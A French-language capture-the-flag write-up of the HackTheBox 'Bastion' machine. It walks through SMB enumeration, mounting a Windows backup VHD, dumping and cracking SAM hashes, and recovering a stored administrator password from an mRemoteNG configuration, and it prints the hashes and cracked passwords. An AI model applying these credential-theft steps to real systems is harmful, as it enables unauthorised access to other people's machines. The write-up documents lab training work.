P0pR0cK5's Blog

Pentest, Challenges, Tests and more ...

View on GitHub

HackTheBox - Bastion

Retour

bastion

Débutons avec un scan :

root@kali:~# nmap -p- -Pn -T5 10.10.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-10 23:42 CEST
Warning: 10.10.10.134 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.134
Host is up (0.066s latency).
Not shown: 63167 closed ports, 2355 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 41.27 seconds

Et si nous regardions la partie SMB ?

root@kali:~# nmap -p445 -A 10.10.10.134
...
Host script results:
|_clock-skew: mean: -59m54s, deviation: 1h24m49s, median: -1h59m53s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-06-10T23:50:42+02:00
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-06-10 23:50:41
|_  start_date: 2019-06-09 23:13:05

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   ... 10
11  14.93 ms 10.10.10.134

En attendant continuons sur l’énumération :

root@kali:~# smbclient -L 10.10.10.134 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC

Un dossier backups vraisemblablement intéressant :

root@kali:~# smbclient //10.10.10.134/ -N
Try "help" to get a list of possible commands.
smb: \> list
0:	server=10.10.10.134, share=backups
smb: \> ls
  .                                       D        0  Tue Apr 16 12:02:11 2019
  ..                                      D        0  Tue Apr 16 12:02:11 2019
  note.txt                               AR      116  Tue Apr 16 12:10:09 2019
  SDT65CB.tmp                             A        0  Fri Feb 22 13:43:08 2019
  WindowsImageBackup                      D        0  Fri Feb 22 13:44:02 2019

		7735807 blocks of size 4096. 2787024 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0,9 KiloBytes/sec) (average 0,9 KiloBytes/sec)

Affichons le contenu des fameuses notes :

root@kali:~# cat note.txt 

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

En gros, nous sommes face à un partage contenant des sauvegardes, voyons voir :

root@kali:~# smbclient //10.10.10.134/backups -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                       D        0  Tue Apr 16 12:02:11 2019
  ..                                      D        0  Tue Apr 16 12:02:11 2019
  note.txt                               AR      116  Tue Apr 16 12:10:09 2019
  SDT65CB.tmp                             A        0  Fri Feb 22 13:43:08 2019
  WindowsImageBackup                      D        0  Fri Feb 22 13:44:02 2019

smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> ls
  .                                       D        0  Fri Feb 22 13:44:02 2019
  ..                                      D        0  Fri Feb 22 13:44:02 2019
  L4mpje-PC                               D        0  Fri Feb 22 13:45:32 2019

smb: \WindowsImageBackup\> cd "L4mpje-PC\Backup 2019-02-22 124351\"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
  .                                       D        0    Fri Feb 22 13:45:32 2019
  ..                                      D        0    Fri Feb 22 13:45:32 2019
  A.vhd                                   A 37761024    Fri Feb 22 13:44:03 2019
  B.vhd                                   A 5418299392  Fri Feb 22 13:45:32 2019

Récupérons ces VHD.

Ils doivent contenir des informations intéressantes, puis montons les :

root@kali:~# virt-list-partitions b.vhd 
/dev/sda1
root@kali:~# virt-list-partitions a.vhd 
/dev/sda1
root@kali:~# guestmount --add b.vhd  --ro /mnt/b -m /dev/sda1
root@kali:~# ls /mnt/b
'$Recycle.Bin'  'Documents and Settings'   ProgramData     'System Volume Information'
 autoexec.bat    pagefile.sys             'Program Files'   Users
 config.sys      PerfLogs                  Recovery         Windows

Nous allons dumper la base de données SAM :

root@kali:/mnt/b/Windows/System32/config# samdump2 -o /root/out.sam /mnt/b/Windows/System32/config/SYSTEM /mnt/b/Windows/System32/config/SAM
root@kali:/mnt/b/Windows/System32/config# cat /root/out.sam 

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Maintenant cassons la avec John :

root@kali:~# john out.sam -format=nt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (*disabled* Administrator)
bureaulampje     (L4mpje)
2g 0:00:00:00 DONE (2019-06-11 17:26) 2.439g/s 11457Kp/s 11457Kc/s 11463KC/s buresres..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
root@kali:~# john /root/out.sam -format=nt --show 
Administrator::500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:bureaulampje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

3 password hashes cracked, 0 left

Connectons-nous via SSH :

l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt 9bfe57d5c3309db3a151772f9d86c6cd

En regardant autour de nous, il semble qu’un client mRemoteNG soit installé. Voyons pour récupérer sa configuration :

root@kali:~# scp -v L4mpje@10.10.10.134:C:/\Users/\L4mpje/\AppData/\Roaming/\mRemoteNG/\confCons.xml mremote.txt

Depuis une machine virtuelle, importons le fichier confCons.xml et extrayons le mot de passe contenu dans les champs. Pour cela :

  • Cliquer sur Outils > Outils externes
  • Faire un clic droit dans une des case vide du tableau > Nouvel outil externe (Maj + F4)
  • Dans nom affiché > Afficher le mot de passe
  • Dans nom du fichier > CMD
  • Arguments > /k echo %password% Maintenant depuis la liste de connexions, faire un clic droit sur la connexion qui nous intéresse et cliquer sur Afficher le mot de passe. Dans notre cas :
thXLHM96BeKL0ER2

Source : http://hackersvanguard.com/mremoteng-insecure-password-storage/

Depuis SSH, tentons d’utiliser le mot de passe trouvé dans mRemoteNG :

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami 
bastion\administrator 
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt 958850b91811676ed6620a9c430e65c8

We are ROOT !

Written on September 7, 2019 by

Retour